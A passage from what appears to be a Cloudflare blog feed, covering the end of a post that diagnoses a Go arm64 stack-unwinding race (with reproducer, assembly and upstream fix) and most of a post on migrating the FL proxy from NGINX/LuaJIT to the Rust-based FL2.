      <a href="#building-a-minimal-reproducer">
        
      </a>
    </div>
    <p>At this point we felt pretty confident that this was actually just a runtime bug and it should be reproducible in an isolated environment without any dependencies. The theory at this point was:</p><ol><li><p>Stack unwinding is triggered by garbage collection</p></li><li><p>Async preemption between a split stack pointer adjustment causes a crash</p></li><li><p>What if we make a function which splits the adjustment and then call it in a loop?</p></li></ol>
            <pre><code>package main

import (
	"runtime"
)

//go:noinline
func big_stack(val int) int {
	var big_buffer = make([]byte, 1 &lt;&lt; 16)

	sum := 0
	// prevent the compiler from optimizing out the stack
	for i := 0; i &lt; (1&lt;&lt;16); i++ {
		big_buffer[i] = byte(val)
	}
	for i := 0; i &lt; (1&lt;&lt;16); i++ {
		sum ^= int(big_buffer[i])
	}
	return sum
}

func main() {
	go func() {
		for {
			runtime.GC()
		}
	}()
	for {
		_ = big_stack(1000)
	}
}
</code></pre>
            <p></p><p>This function ends up with a stack frame slightly larger than can be represented in 16 bits, and so on arm64 the Go compiler will split the stack pointer adjustment into two opcodes. If the runtime preempts between these opcodes then the stack unwinder will read an invalid stack pointer and crash. </p>
            <pre><code>; epilogue for main.big_stack
ADD $8, RSP, R29
ADD $(16&lt;&lt;12), R29, R29
ADD $16, RSP, RSP
; preemption is problematic between these opcodes
ADD $(16&lt;&lt;12), RSP, RSP
RET
</code></pre>
            <p></p><p>After running this for a few minutes the program panicked as expected!</p>
            <pre><code>SIGSEGV: segmentation violation
PC=0x60598 m=8 sigcode=1 addr=0x118

goroutine 0 gp=0x400019c540 m=8 mp=0x4000198708 [idle]:
runtime.(*unwinder).next(0x400030fd10)
        /home/thea/sdk/go1.23.4/src/runtime/traceback.go:458 +0x188 fp=0x400030fcc0 sp=0x400030fc30 pc=0x60598
runtime.scanstack(0x40000021c0, 0x400002f750)
        /home/thea/sdk/go1.23.4/src/runtime/mgcmark.go:887 +0x290 

[...]

goroutine 1 gp=0x40000021c0 m=nil [runnable (scan)]:
runtime.asyncPreempt2()
        /home/thea/sdk/go1.23.4/src/runtime/preempt.go:308 +0x3c fp=0x40003bfcf0 sp=0x40003bfcd0 pc=0x400cc
runtime.asyncPreempt()
        /home/thea/sdk/go1.23.4/src/runtime/preempt_arm64.s:47 +0x9c fp=0x40003bfee0 sp=0x40003bfcf0 pc=0x75aec
main.big_stack(0x40003cff38?)
        /home/thea/dev/stack_corruption_reproducer/main.go:29 +0x94 fp=0x40003cff00 sp=0x40003bfef0 pc=0x77c04
Segmentation fault (core dumped)

real    1m29.165s
user    4m4.987s
sys     0m43.212s</code></pre>
            <p></p><p>A reproducible crash with standard library only? This felt like conclusive evidence that our problem was a runtime bug.</p><p>This was an extremely finicky reproducer! Even now, with a good understanding of the bug and its fix, some of the behavior is still puzzling. It’s a one-instruction race condition, so it’s unsurprising that small changes could have a large impact. For example, this reproducer was originally written and tested on Go 1.23.4, but did not crash when compiled with 1.23.9 (the version in production), even though we could objdump the binary and see the split ADD still present! We don’t have a definite explanation for this behavior – even with the bug present there remain a few unknown variables which affect the likelihood of hitting the race condition.</p>
    <div>
      <h2>A single-instruction race condition window</h2>
      <a href="#a-single-instruction-race-condition-window">
        
      </a>
    </div>
    <p>arm64 is a fixed-length 4-byte instruction set architecture. This has a lot of implications for codegen, but most relevant to this bug is the fact that immediate length is limited.<a href="https://developer.arm.com/documentation/ddi0596/2020-12/Base-Instructions/ADD--immediate---Add--immediate--"> <code><u>add</u></code></a> gets a 12-bit immediate,<a href="https://developer.arm.com/documentation/dui0802/a/A64-General-Instructions/MOV--wide-immediate-"> <code><u>mov</u></code></a> gets a 16-bit immediate, etc. How does the architecture handle this when the operands don't fit? It depends – <code>ADD</code> in particular reserves a bit for "shift left by 12", so any 24-bit addition can be decomposed into two opcodes. Other instructions are decomposed similarly, or just require loading an immediate into a register first.</p><p>The very last step of the Go compiler before emitting machine code involves transforming the program into <code>obj.Prog</code> structs. It's a very low-level intermediate representation (IR) that mostly serves to be translated into machine code.</p>
            <pre><code>//https://github.com/golang/go/blob/fa2bb342d7b0024440d996c2d6d6778b7a5e0247/src/cmd/internal/obj/arm64/obj7.go#L856

// Pop stack frame.
// ADD $framesize, RSP, RSP
p = obj.Appendp(p, c.newprog)
p.As = AADD
p.From.Type = obj.TYPE_CONST
p.From.Offset = int64(c.autosize)
p.To.Type = obj.TYPE_REG
p.To.Reg = REGSP
p.Spadj = -c.autosize
</code></pre>
            <p></p><p>Notably, this IR is not aware of immediate length limitations. Instead, this happens in<a href="https://github.com/golang/go/blob/2f653a5a9e9112ff64f1392ff6e1d404aaf23e8c/src/cmd/internal/obj/arm64/asm7.go"> <u>asm7.go</u></a> when Go's internal intermediate representation is translated into arm64 machine code. The assembler will classify an immediate in <a href="https://github.com/golang/go/blob/2f653a5a9e9112ff64f1392ff6e1d404aaf23e8c/src/cmd/internal/obj/arm64/asm7.go#L1905"><u>conclass</u></a> based on bit size and then use that classification when emitting instructions, adding extra opcodes if needed.</p><p>The Go assembler uses a combination of (<code>mov, add</code>) opcodes for some adds that fit in 16-bit immediates, and prefers (<code>add, add + lsl 12</code>) opcodes for immediates of 16 bits or more.</p><p>Compare a stack of (slightly larger than) <code>1&lt;&lt;15</code>:</p>
            <pre><code>; //go:noinline
; func big_stack() byte {
; 	var big_stack = make([]byte, 1&lt;&lt;15)
; 	return big_stack[0]
; }
MOVD $32776, R27
ADD R27, RSP, R29
MOVD $32784, R27
ADD R27, RSP, RSP
RET
</code></pre>
            <p></p><p>With a stack of <code>1&lt;&lt;16</code>:</p>
            <pre><code>; //go:noinline
; func big_stack() byte {
; 	var big_stack = make([]byte, 1&lt;&lt;16)
; 	return big_stack[0]
; } 
ADD $8, RSP, R29
ADD $(16&lt;&lt;12), R29, R29
ADD $16, RSP, RSP
ADD $(16&lt;&lt;12), RSP, RSP
RET
</code></pre>
            <p>In the larger stack case, there is a point between the two <code>ADD x, RSP, RSP</code> opcodes where the stack pointer is not pointing to the tip of a stack frame. We thought at first that this was a matter of memory corruption – that in handling async preemption the runtime would push a function call on the stack and corrupt the middle of the stack. However, this goroutine is already in the function epilogue – any data we corrupt is actively in the process of being thrown away. What's the issue then?</p><p>The Go runtime often needs to <b>unwind</b> the stack, which means walking backwards through the chain of function calls. For example: garbage collection uses it to find live references on the stack, panicking relies on it to evaluate <code>defer</code> functions, and generating stack traces needs to print the call stack. For this to work the stack pointer <b>must be accurate during unwinding</b> because of how Go dereferences <code>sp</code> to determine the calling function. If the stack pointer is partially modified, the unwinder will look for the calling function in the middle of the stack. The underlying data is meaningless when interpreted as directions to a parent stack frame, and the runtime will likely crash.</p>
            <pre><code>//https://github.com/golang/go/blob/66536242fce34787230c42078a7bbd373ef8dcb0/src/runtime/traceback.go#L373

if innermost &amp;&amp; frame.sp &lt; frame.fp || frame.lr == 0 {
    lrPtr = frame.sp
    frame.lr = *(*uintptr)(unsafe.Pointer(lrPtr))
}
</code></pre>
            <p></p><p>When async preemption happens, it pushes a function call onto the stack, but the recorded parent stack frame is no longer correct because <code>sp</code> was only partially adjusted when the preemption happened. The crash flow looks something like this:</p><ol><li><p>Async preemption happens between the two opcodes that <code>add x, rsp</code> expands to</p></li><li><p>Garbage collection triggers stack unwinding (to check for heap object liveness)</p></li><li><p>The unwinder starts traversing the stack of the problematic goroutine and correctly unwinds up to the problematic function</p></li><li><p>The unwinder dereferences <code>sp</code> to determine the parent function</p></li><li><p>Almost certainly the data behind <code>sp</code> is not a function</p></li><li><p>Crash</p></li></ol>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5LKOBC6lQzuKvwy0vyEfk2/054c9aaedc14d155294a682f7de3a610/BLOG-2906_3.png" />
          </figure><p>We saw earlier a faulting stack trace which ended in <code>(*NetlinkSocket).Receive</code> – in this case stack unwinding faulted while it was trying to determine the parent frame.    </p>
            <pre><code>goroutine 90 gp=0x40042cc000 m=nil [preempted (scan)]:
runtime.asyncPreempt2()
/usr/local/go/src/runtime/preempt.go:306 +0x2c fp=0x40060a25d0 sp=0x40060a25b0 pc=0x55557e299dec
runtime.asyncPreempt()
/usr/local/go/src/runtime/preempt_arm64.s:47 +0x9c fp=0x40060a27c0 sp=0x40060a25d0 pc=0x55557e2dc94c
github.com/vishvananda/netlink/nl.(*NetlinkSocket).Receive(0xff48ce6e060b2848?)
/vendor/github.com/vishvananda/netlink/nl/nl_linux.go:779 +0x130 fp=0x40060b2820 sp=0x40060a27d0 pc=0x55557e9d2880
</code></pre>
            <p></p><p>Once we discovered the root cause we reported it with a reproducer, and the bug was quickly fixed. The fix shipped in <a href="https://github.com/golang/go/commit/e8794e650e05fad07a33fb6e3266a9e677d13fa8"><u>go1.23.12</u></a>, <a href="https://github.com/golang/go/commit/6e1c4529e4e00ab58572deceab74cc4057e6f0b6"><u>go1.24.6</u></a>, and <a href="https://github.com/golang/go/commit/f7cc61e7d7f77521e073137c6045ba73f66ef902"><u>go1.25.0</u></a>. Previously, the Go compiler emitted a single <code>add x, rsp</code> instruction and relied on the assembler to split immediates into multiple opcodes as necessary. After this change, stacks larger than <code>1&lt;&lt;12</code> build the offset in a temporary register and then add it to <code>rsp</code> in a single, indivisible opcode. A goroutine can be preempted before or after the stack pointer modification, but never during. This means the stack pointer is always valid and there is no race condition.</p>
            <pre><code>LDP -8(RSP), (R29, R30)
MOVD $32, R27
MOVK $(1&lt;&lt;16), R27
ADD R27, RSP, RSP
RET</code></pre>
            <p></p><p>This was a very fun problem to debug. We don’t often see bugs where you can accurately blame the compiler. Debugging it took weeks and we had to learn about areas of the Go runtime that people don’t usually need to think about. It’s a nice example of a rare race condition, the sort of bug that can only really be quantified at a large scale.</p><p>We’re always looking for people who enjoy this kind of detective work. <a href="https://www.cloudflare.com/careers/jobs/?department=Engineering"><u>Our engineering teams are hiring</u></a>.   </p> ]]></content:encoded>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Go]]></category>
            <category><![CDATA[Programming]]></category>
            <guid isPermaLink="false">12E3V053vhNrZrU5I2AAV1</guid>
            <dc:creator>Thea Heinen</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare just got faster and more secure, powered by Rust]]></title>
            <link>https://blog.cloudflare.com/20-percent-internet-upgrade/</link>
            <pubDate>Fri, 26 Sep 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ We’ve replaced Cloudflare’s original core system, built on NGINX, with a new modular Rust-based proxy. ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare is relentless about building and running the world’s fastest network. We have been <a href="https://blog.cloudflare.com/tag/network-performance-update/"><u>tracking and reporting on our network performance since 2021</u></a>: you can see the latest update <a href="https://blog.cloudflare.com/tag/network-performance-update/"><u>here</u></a>.</p><p>Building the fastest network requires work in many areas. We invest a lot of time in our hardware, to have efficient and fast machines. We invest in peering arrangements, to make sure we can talk to every part of the Internet with minimal delay. On top of this, we also have to invest in the software we run our network on, especially as each new product can otherwise add more processing delay.</p><p>No matter how fast messages arrive, we introduce a bottleneck if that software takes too long to think about how to process and respond to requests. Today we are excited to share a significant upgrade to our software that cuts the median time we take to respond by 10ms and delivers a 25% performance boost, as measured by third-party CDN performance tests.</p><p>We've spent the last year rebuilding major components of our system, and we've just slashed the latency of traffic passing through our network for millions of our customers. At the same time, we've made our system more secure, and we've reduced the time it takes for us to build and release new products. </p>
    <div>
      <h2>Where did we start?</h2>
      <a href="#where-did-we-start">
        
      </a>
    </div>
    <p>Every request that hits Cloudflare starts a journey through our network. It might come from a browser loading a webpage, a mobile app calling an API, or automated traffic from another service. These requests first terminate at our HTTP and TLS layer, then pass into a system we call FL, and finally through <a href="https://blog.cloudflare.com/pingora-open-source/"><u>Pingora</u></a>, which performs cache lookups or fetches data from the origin if needed.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/CKW3jrB9vw4UhXx6OYJpt/928b9e9c1c794f7622fc4ad469d66b60/image3.png" />
          </figure><p>FL is the brain of Cloudflare. Once a request reaches FL, we then run the various security and performance features in our network. It applies each customer’s unique configuration and settings, from enforcing <a href="https://developers.cloudflare.com/waf/managed-rules/"><u>WAF rules </u></a>and <a href="https://www.cloudflare.com/ddos/"><u>DDoS protection</u></a> to routing traffic to the <a href="https://developers.cloudflare.com/learning-paths/workers/devplat/intro-to-devplat/"><u>Developer Platform </u></a>and <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a>. </p><p>Built more than 15 years ago, FL has been at the core of Cloudflare’s network. It enables us to deliver a broad range of features, but over time that flexibility became a challenge. As we added more products, FL grew harder to maintain, slower to process requests, and more difficult to extend. Each new feature required careful checks across existing logic, and every addition introduced a little more latency, making it increasingly difficult to sustain the performance we wanted.</p><p>You can see how FL is key to our system — we’ve often called it the “brain” of Cloudflare. It’s also one of the oldest parts of our system: the first commit to the codebase was made by one of our founders, Lee Holloway, well before our initial launch. We’re celebrating our 15th Birthday this week - this system started 9 months before that!</p>
            <pre><code>commit 39c72e5edc1f05ae4c04929eda4e4d125f86c5ce
Author: Lee Holloway &lt;q@t60.(none)&gt;
Date:   Wed Jan 6 09:57:55 2010 -0800

    nginx-fl initial configuration</code></pre>
            <p>As the commit implies, the first version of FL was built on the NGINX web server, with product logic implemented in PHP. After three years the system had become too complex to manage effectively and too slow to respond, so an almost complete rewrite of the running system was performed. This led to another significant commit, this time made by Dane Knecht, who is now our CTO.</p>
            <pre><code>commit bedf6e7080391683e46ab698aacdfa9b3126a75f
Author: Dane Knecht
Date:   Thu Sep 19 19:31:15 2013 -0700

    remove PHP.</code></pre>
            <p>From this point on, FL was implemented using NGINX, the <a href="https://openresty.org/en/"><u>OpenResty</u></a> framework, and <a href="https://luajit.org/"><u>LuaJIT</u></a>.  While this was great for a long time, over the last few years it started to show its age. We had to spend increasing amounts of time fixing or working around obscure bugs in LuaJIT. The highly dynamic and unstructured nature of our Lua code, which was a blessing when first trying to implement logic quickly, became a source of errors and delay when trying to integrate large amounts of complex product logic. Each time a new product was introduced, we had to go through all the other existing products to check if they might be affected by the new logic.</p><p>It was clear that we needed a rethink. So, in July 2024, we cut an initial commit for a brand new, and radically different, implementation. To save time agreeing on a new name for this, we just called it “FL2”, and started, of course, referring to the original FL as “FL1”.</p>
            <pre><code>commit a72698fc7404a353a09a3b20ab92797ab4744ea8
Author: Maciej Lechowski
Date:   Wed Jul 10 15:19:28 2024 +0100

    Create fl2 project</code></pre>
            
    <div>
      <h2>Rust and rigid modularization</h2>
      <a href="#rust-and-rigid-modularization">
        
      </a>
    </div>
    <p>We weren’t starting from scratch. We’ve <a href="https://blog.cloudflare.com/how-we-built-pingora-the-proxy-that-connects-cloudflare-to-the-internet/"><u>previously blogged</u></a> about how we replaced another one of our legacy systems with Pingora, which is built in the <a href="https://www.rust-lang.org/"><u>Rust</u></a> programming language, using the <a href="https://tokio.rs/"><u>Tokio</u></a> runtime. We’ve also <a href="https://blog.cloudflare.com/introducing-oxy/"><u>blogged about Oxy</u></a>, our internal framework for building proxies in Rust. We write a lot of Rust, and we’ve gotten pretty good at it.</p><p>We built FL2 in Rust, on Oxy, and built a strict module framework to structure all the logic in FL2.</p>
    <div>
      <h2>Why Oxy?</h2>
      <a href="#why-oxy">
        
      </a>
    </div>
    <p>When we set out to build FL2, we knew we weren’t just replacing an old system; we were rebuilding the foundations of Cloudflare. That meant we needed more than just a proxy; we needed a framework that could evolve with us, handle the immense scale of our network, and let teams move quickly without sacrificing safety or performance. </p><p>Oxy gives us a powerful combination of performance, safety, and flexibility. Built in Rust, it eliminates entire classes of bugs that plagued our Nginx/LuaJIT-based FL1, like memory safety issues and data races, while delivering C-level performance. At Cloudflare’s scale, those guarantees aren’t nice-to-haves, they’re essential. Every microsecond saved per request translates into tangible improvements in user experience, and every crash or edge case avoided keeps the Internet running smoothly. Rust’s strict compile-time guarantees also pair perfectly with FL2’s modular architecture, where we enforce clear contracts between product modules and their inputs and outputs.</p><p>But the choice wasn’t just about language. Oxy is the culmination of years of experience building high-performance proxies. It already powers several major Cloudflare services, from our <a href="https://developers.cloudflare.com/cloudflare-one/"><u>Zero Trust</u></a> Gateway to <a href="https://blog.cloudflare.com/icloud-private-relay/"><u>Apple’s iCloud Private Relay</u></a>, so we knew it could handle the diverse traffic patterns and protocol combinations that FL2 would see. Its extensibility model lets us intercept, analyze, and manipulate traffic from<a href="https://www.cloudflare.com/en-gb/learning/ddos/glossary/open-systems-interconnection-model-osi/"><u> layer 3 up to layer 7</u></a>, and even decapsulate and reprocess traffic at different layers. 
That flexibility is key to FL2’s design because it means we can treat everything from HTTP to raw IP traffic consistently and evolve the platform to support new protocols and features without rewriting fundamental pieces.</p><p>Oxy also comes with a rich set of built-in capabilities that previously required large amounts of bespoke code. Things like monitoring, soft reloads, dynamic configuration loading and swapping are all part of the framework. That lets product teams focus on the unique business logic of their module rather than reinventing the plumbing every time. This solid foundation means we can make changes with confidence, ship them quickly, and trust they’ll behave as expected once deployed.</p>
    <div>
      <h2>Smooth restarts - keeping the Internet flowing</h2>
      <a href="#smooth-restarts-keeping-the-internet-flowing">
        
      </a>
    </div>
    <p>One of the most impactful improvements Oxy brings is handling of restarts. Any software under continuous development and improvement will eventually need to be updated. In desktop software, this is easy: you close the program, install the update, and reopen it. On the web, things are much harder. Our software is in constant use and cannot simply stop. A dropped HTTP request can cause a page to fail to load, and a broken connection can kick you out of a video call. Reliability is not optional.</p><p>In FL1, upgrades meant restarts of the proxy process. Restarting a proxy meant terminating the process entirely, which immediately broke any active connections. That was particularly painful for long-lived connections such as WebSockets, streaming sessions, and real-time APIs. Even planned upgrades could cause user-visible interruptions, and unplanned restarts during incidents could be even worse.</p><p>Oxy changes that. It includes a built-in mechanism for <a href="https://blog.cloudflare.com/oxy-the-journey-of-graceful-restarts/"><u>graceful restarts</u></a> that lets us roll out new versions without dropping connections whenever possible. When a new instance of an Oxy-based service starts up, the old one stops accepting new connections but continues to serve existing ones, allowing those sessions to continue uninterrupted until they end naturally.</p><p>This means that if you have an ongoing WebSocket session when we deploy a new version, that session can continue uninterrupted until it ends naturally, rather than being torn down by the restart. Across Cloudflare’s fleet, deployments are orchestrated over several hours, so the aggregate rollout is smooth and nearly invisible to end users.</p><p>We take this a step further by using systemd socket activation. Instead of letting each proxy manage its own sockets, we let systemd create and own them. This decouples the lifetime of sockets from the lifetime of the Oxy application itself. 
If an Oxy process restarts or crashes, the sockets remain open and ready to accept new connections, which will be served as soon as the new process is running. That eliminates the “connection refused” errors that could happen during restarts in FL1 and improves overall availability during upgrades.</p><p>We also built our own coordination mechanisms in Rust to replace Go libraries like <a href="https://github.com/cloudflare/tableflip"><u>tableflip</u></a> with <a href="https://github.com/cloudflare/shellflip"><u>shellflip</u></a>. This uses a restart coordination socket that validates configuration, spawns new instances, and ensures the new version is healthy before the old one shuts down. This improves feedback loops and lets our automation tools detect and react to failures immediately, rather than relying on blind signal-based restarts.</p>
    <div>
      <h2>Composing FL2 from Modules</h2>
      <a href="#composing-fl2-from-modules">
        
      </a>
    </div>
    <p>To avoid the problems we had in FL1, we wanted a design where all interactions between product logic were explicit and easy to understand. </p><p>So, on top of the foundations provided by Oxy, we built a platform which separates all the logic built for our products into well-defined modules. After some experimentation and research, we designed a module system which enforces some strict rules:</p><ul><li><p>No IO (input or output) can be performed by the module.</p></li><li><p>The module provides a list of <b>phases</b>.</p></li><li><p>Phases are evaluated in a strictly defined order, which is the same for every request.</p></li><li><p>Each phase defines a set of inputs which the platform provides to it, and a set of outputs which it may emit.</p></li></ul><p>Here’s an example of what a module phase definition looks like:</p>
            <pre><code>Phase {
    name: phases::SERVE_ERROR_PAGE,
    request_types_enabled: PHASE_ENABLED_FOR_REQUEST_TYPE,
    inputs: vec![
        InputKind::IPInfo,
        InputKind::ModuleValue(
            MODULE_VALUE_CUSTOM_ERRORS_FETCH_WORKER_RESPONSE.as_str(),
        ),
        InputKind::ModuleValue(MODULE_VALUE_ORIGINAL_SERVE_RESPONSE.as_str()),
        InputKind::ModuleValue(MODULE_VALUE_RULESETS_CUSTOM_ERRORS_OUTPUT.as_str()),
        InputKind::ModuleValue(MODULE_VALUE_RULESETS_UPSTREAM_ERROR_DETAILS.as_str()),
        InputKind::RayId,
        InputKind::StatusCode,
        InputKind::Visitor,
    ],
    outputs: vec![OutputValue::ServeResponse],
    filters: vec![],
    func: phase_serve_error_page::callback,
}</code></pre>
            <p>This phase is for our custom error page product.  It takes a few things as input — information about the IP of the visitor, some header and other HTTP information, and some “module values.” Module values allow one module to pass information to another, and they’re key to making the strict properties of the module system workable. For example, this module needs some information that is produced by the output of our rulesets-based custom errors product (the “<code>MODULE_VALUE_RULESETS_CUSTOM_ERRORS_OUTPUT</code>” input). These input and output definitions are enforced at compile time.</p><p>While these rules are strict, we’ve found that we can implement all our product logic within this framework. The benefit of doing so is that we can immediately tell which other products might affect each other.</p>
    <div>
      <h2>How to replace a running system</h2>
      <a href="#how-to-replace-a-running-system">
        
      </a>
    </div>
    <p>Building a framework is one thing. Building all the product logic and getting it right, so that customers don’t notice anything other than a performance improvement, is another.</p><p>The FL code base supports 15 years of Cloudflare products, and it’s changing all the time. We couldn’t stop development. So, one of our first tasks was to find ways to make the migration easier and safer.</p>
    <div>
      <h3>Step 1 - Rust modules in OpenResty</h3>
      <a href="#step-1-rust-modules-in-openresty">
        
      </a>
    </div>
    <p>Rebuilding product logic in Rust is a big enough distraction from shipping products to customers. Asking all our teams to also maintain two versions of that logic, and to reimplement every change a second time until we finished our migration, was too much.</p><p>So, we implemented a layer in our old NGINX and OpenResty based FL which allowed the new modules to be run. Instead of maintaining a parallel implementation, teams could implement their logic in Rust, and replace their old Lua logic with that, without waiting for the full replacement of the old system.</p><p>For example, here’s part of the implementation for the custom error page module phase defined earlier (we’ve cut out some of the more boring details, so this doesn’t quite compile as-written):</p>
            <pre><code>pub(crate) fn callback(_services: &amp;mut Services, input: &amp;Input&lt;'_&gt;) -&gt; Output {
    // Rulesets produced a response to serve - this can either come from a special
    // Cloudflare worker for serving custom errors, or be directly embedded in the rule.
    if let Some(rulesets_params) = input
        .get_module_value(MODULE_VALUE_RULESETS_CUSTOM_ERRORS_OUTPUT)
        .cloned()
    {
        // Select either the result from the special worker, or the parameters embedded
        // in the rule.
        let body = input
            .get_module_value(MODULE_VALUE_CUSTOM_ERRORS_FETCH_WORKER_RESPONSE)
            .and_then(|response| {
                handle_custom_errors_fetch_response("rulesets", response.to_owned())
            })
            .or(rulesets_params.body);

        // If we were able to load a body, serve it, otherwise let the next bit of logic
        // handle the response
        if let Some(body) = body {
            let final_body = replace_custom_error_tokens(input, &amp;body);

            // Increment a metric recording number of custom error pages served
            custom_pages::pages_served("rulesets").inc();

            // Return a phase output with one final action, causing an HTTP response to be served.
            return Output::from(TerminalAction::ServeResponse(ResponseAction::OriginError {
                status: rulesets_params.status,
                source: "rulesets http_custom_errors",
                headers: rulesets_params.headers,
                body: Some(Bytes::from(final_body)),
            }));
        }
    }
}</code></pre>
            <p>The internal logic in each module is quite cleanly separated from the handling of data, with very clear and explicit error handling encouraged by the design of the Rust language.</p><p>Many of our most actively developed modules were handled this way, allowing the teams to maintain their change velocity during our migration.</p>
    <div>
      <h3>Step 2 - Testing and automated rollouts</h3>
      <a href="#step-2-testing-and-automated-rollouts">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6OElHIMjnkIQmsbx92ZOYc/545a26ba623a253ea1a5c6b13279301d/image4.png" />
          </figure><p>It’s essential to have a seriously powerful test framework to cover such a migration. We built a system, internally named Flamingo, which allows us to run thousands of full end-to-end test requests concurrently against our production and pre-production systems. The same tests run against FL1 and FL2, giving us confidence that we’re not changing behaviours.</p><p>Whenever we deploy a change, that change is rolled out gradually across many stages, with increasing amounts of traffic. Each stage is automatically evaluated, and only passes when the full set of tests has run successfully against it, and when overall performance and resource-usage metrics are within acceptable bounds. This system is fully automated, and pauses or rolls back changes if the tests fail.
</p><p>The benefit is that we’re able to build and ship new product features in FL2 within 48 hours - where it would have taken weeks in FL1. In fact, at least one of the announcements this week involved such a change!</p>
    <div>
      <h3>Step 3 - Fallbacks</h3>
      <a href="#step-3-fallbacks">
        
      </a>
    </div>
    <p>Over 100 engineers have worked on FL2, and we have over 130 modules. And we’re not quite done yet. We're still putting the final touches on the system, to make sure it replicates all the behaviours of FL1.</p><p>So how do we send traffic to FL2 before it can handle everything? If FL2 receives a request, or a piece of configuration for a request, that it doesn’t know how to handle, it gives up and performs what we’ve called a <b>fallback</b>: it hands the whole request over to FL1 at the network level, simply passing the bytes on.</p><p>As well as making it possible for us to send traffic to FL2 before it is fully complete, this has another massive benefit. When we have implemented a piece of new functionality in FL2, but want to double-check that it behaves the same as in FL1, we can evaluate the functionality in FL2 and then trigger a fallback. We can then compare the behaviour of the two systems, giving us high confidence that our implementation is correct.</p>
    <div>
      <h3>Step 4 - Rollout</h3>
      <a href="#step-4-rollout">
        
      </a>
    </div>
    <p>We started running customer traffic through FL2 early in 2025, and have been progressively increasing the amount of traffic served throughout the year. Essentially, we’ve been watching two graphs: one with the proportion of traffic routed to FL2 going up, and another with the proportion of traffic failing to be served by FL2 and falling back to FL1 going down.</p><p>We started this process by passing traffic for our free customers through the system. We were able to prove that the system worked correctly, and drive the fallback rates down for our major modules. Our <a href="https://community.cloudflare.com/"><u>Cloudflare Community</u></a> MVPs acted as an early warning system, smoke testing and flagging when they suspected the new platform might be the cause of a new reported problem. Crucially, their support allowed our team to investigate quickly, apply targeted fixes, or confirm that the move to FL2 was not to blame.</p><p>
We then advanced to our paying customers, gradually increasing the number of customers using the system. We also worked closely with some of our largest customers, who wanted the performance benefits of FL2, and onboarded them early in exchange for lots of feedback on the system.</p><p>Right now, most of our customers are using FL2. We still have a few features to complete, and are not quite ready to onboard everyone, but our target is to turn off FL1 within a few more months.</p>
    <div>
      <h2>Impact of FL2</h2>
      <a href="#impact-of-fl2">
        
      </a>
    </div>
    <p>As we described at the start of this post, FL2 is substantially faster than FL1. The biggest reason for this is simply that FL2 performs less work. You might have noticed this line in the module definition example:</p>
            <pre><code>    filters: vec![],</code></pre>
            <p>Every module is able to provide a set of filters, which control whether they run or not. This means that we don’t run logic for every product for every request — we can very easily select just the required set of modules. The incremental cost for each new product we develop has gone away.</p><p>Another huge reason for better performance is that FL2 is a single codebase, implemented in a performance-focussed language. In comparison, FL1 was based on NGINX (which is written in C), combined with LuaJIT (Lua, and C interface layers), and also contained plenty of Rust modules. In FL1, we spent a lot of time and memory converting data from the representation needed by one language to the representation needed by another.</p><p>As a result, our internal measures show that FL2 uses less than half the CPU of FL1, and much less than half the memory. That’s a huge bonus — we can spend the CPU on delivering more and more features for our customers!</p>
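<p>As a rough sketch of how such filters could work (the <code>Filter</code> and <code>RequestConfig</code> types here are hypothetical, not FL2’s actual definitions), a phase runs only when all of its filters match the request’s configuration:</p>

```rust
// Hypothetical sketch of phase filters gating module execution.
// `Filter`, `RequestConfig`, and the field names are illustrative.
struct RequestConfig {
    custom_error_pages_enabled: bool,
    waf_enabled: bool,
}

enum Filter {
    CustomErrorPagesEnabled,
    WafEnabled,
}

impl Filter {
    fn matches(&self, config: &RequestConfig) -> bool {
        match self {
            Filter::CustomErrorPagesEnabled => config.custom_error_pages_enabled,
            Filter::WafEnabled => config.waf_enabled,
        }
    }
}

/// A phase runs only if every one of its filters matches; an empty
/// filter list (like `filters: vec![]` above) means "run for every request".
fn phase_enabled(filters: &[Filter], config: &RequestConfig) -> bool {
    filters.iter().all(|f| f.matches(config))
}

fn main() {
    let config = RequestConfig { custom_error_pages_enabled: true, waf_enabled: false };
    assert!(phase_enabled(&[], &config));
    assert!(phase_enabled(&[Filter::CustomErrorPagesEnabled], &config));
    assert!(!phase_enabled(&[Filter::WafEnabled], &config));
    println!("filter checks passed");
}
```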
    <div>
      <h2>How do we measure if we are getting better?</h2>
      <a href="#how-do-we-measure-if-we-are-getting-better">
        
      </a>
    </div>
    <p>Using our own tools and independent benchmarks like <a href="https://www.cdnperf.com/"><u>CDNPerf</u></a>, we measured the impact of FL2 as we rolled it out across the network. The results are clear: websites are responding 10 ms faster at the median, a 25% performance boost.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/eDqQvbAfrQoSXPZed0fd7/d7fe0d28e33a3f2e8dfcd27cf79c900f/image1.png" />
          </figure>
    <div>
      <h2>Security</h2>
      <a href="#security">
        
      </a>
    </div>
    <p>FL2 is also more secure by design than FL1. No software system is perfect, but the Rust language brings us huge benefits over LuaJIT. Rust has strong compile-time memory checks and a type system that avoids large classes of errors. Combine that with our rigid module system, and we can make most changes with high confidence.</p><p>Of course, no system is secure if used badly - it is still possible to write Rust code that causes memory corruption. To reduce risk, we maintain strong compile-time linting and checking, together with strict coding standards, testing and review processes.</p><p>We have long followed a policy that any unexplained crash of our systems needs to be <a href="https://blog.cloudflare.com/however-improbable-the-story-of-a-processor-bug/"><u>investigated as a high priority</u></a>. We won’t be relaxing that policy, though the main cause of novel crashes in FL2 so far has been hardware failure. The massively reduced rate of such crashes will give us time to do a good job of these investigations.</p>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
